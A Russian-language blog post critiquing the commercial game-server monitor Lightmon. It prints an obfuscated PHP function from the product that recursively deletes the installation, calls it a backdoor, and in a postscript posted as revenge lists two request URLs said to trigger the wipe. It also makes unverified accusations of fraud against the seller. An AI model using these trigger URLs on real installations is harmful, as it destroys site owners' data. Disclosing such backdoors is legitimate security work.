Lightmon — очередной мониторинг игровых серверов, но на этот раз он коммерческий.

Мое знакомство с Lightmon состоялось еще когда я работал в HF, клиент попросил раскодировать некоторые скрипты, конечно не за бесплатно.

После начала написания API для мониторинга я решил посмотреть как сделано у моего «старого знакомого».
Оказалась уже 2я версия вышла, с защитой от «Null» версий ( наверно, какой то чудо алгоритм который я не нашел =\ ).

Зато, поступила жалоба то что команда разработчиков зайдя под секретным URL может удалить к чертям весь мониторинг и снести БД.

После 5 минут поиска наткнулся на Epic Fail.
Фаил ./engine/function/main.php кешит таки переменными под названиями вида «IIIIIIII1lll», но функции все вроде с нормальными названиями, кроме одной.

function IIIIIIIII1II($IIIIIIII1l1l) {
global $conf;
if(is_file($IIIIIIII1l1l)) return unlink($IIIIIIII1l1l);
$IIIIIIII1l11=opendir($IIIIIIII1l1l);
while(false!==($IIIIIIII1Ill=readdir($IIIIIIII1l11))) {
if($IIIIIIII1Ill=='.'||$IIIIIIII1Ill=='..') continue;
IIIIIIIII1II($IIIIIIII1l1l."/".$IIIIIIII1Ill);
}
closedir($IIIIIIII1l11);
return rmdir($IIIIIIII1l1l);
}

Вот, и бэкдорчик который сносит весь мониторинг.
Бэкдор который сносит БД увы, не нашел.

Что же подведем итоги.
Мы покупаем хреновый продукт ( весь проект в ANSI, HTML код в Windows-1251, код в стиле Yuna ( код не возможно читать и присутствуют SQL инъекции ) ) у не понятного продавца ( лицензии и лицензионного соглашения я увы не нашел ).
В подарок мы получаем бэкдор, который к чертям сносит мониторинг.

P.S.
Т.к. команда разработчиков сносили все время мои сообщения, не воспринимали критику то вот в отместку URL по которым можно снести мониторинг ( данные URL я предоставляю чисто в ознакомительных целях ):

http://lightmon/index.php?do=view&update=1
http://lightmon/index.php?do=user&register&update=1

P.P.S.
Спросил у администратора сайта его ИНН, дал какие то 12 не понятных цифр ( ИНН содержит 10 цифр ) и после долгого разговора, что у него как у бизнесмена нет времени и он намерен подать на меня иск в суд.
Все последующие вопросы сказал задавать своему хостеру ( круто устроился, значит, я обманываю людей на тысячи рублей, а во всем обвиняю своего хостера ).
На вопрос имеет ли хостинг какое либо отношение к данному сайту, кроме как к хостит его, ТП внятного ответа не дала.

Но что-то мучают меня сомнения то что, данный «бизнесмен», не имеет не ИП, не ИНН. И просто тупо в наглую продает свое извините, дерьмо которое ни хрена нормально не работает.

P.P.P.S.
Т.к. ползли слухи о том что данная запись пиар мониторинга от «amxserv.net», заявляю то что я не имею никакого отношения к проекту amxserv.
Их мониторинг хоть и не имеет бэкдора, но тоже дырявый. Если уж разговор пошел какой мониторинг использовать. То LGSL самый лучший вариант!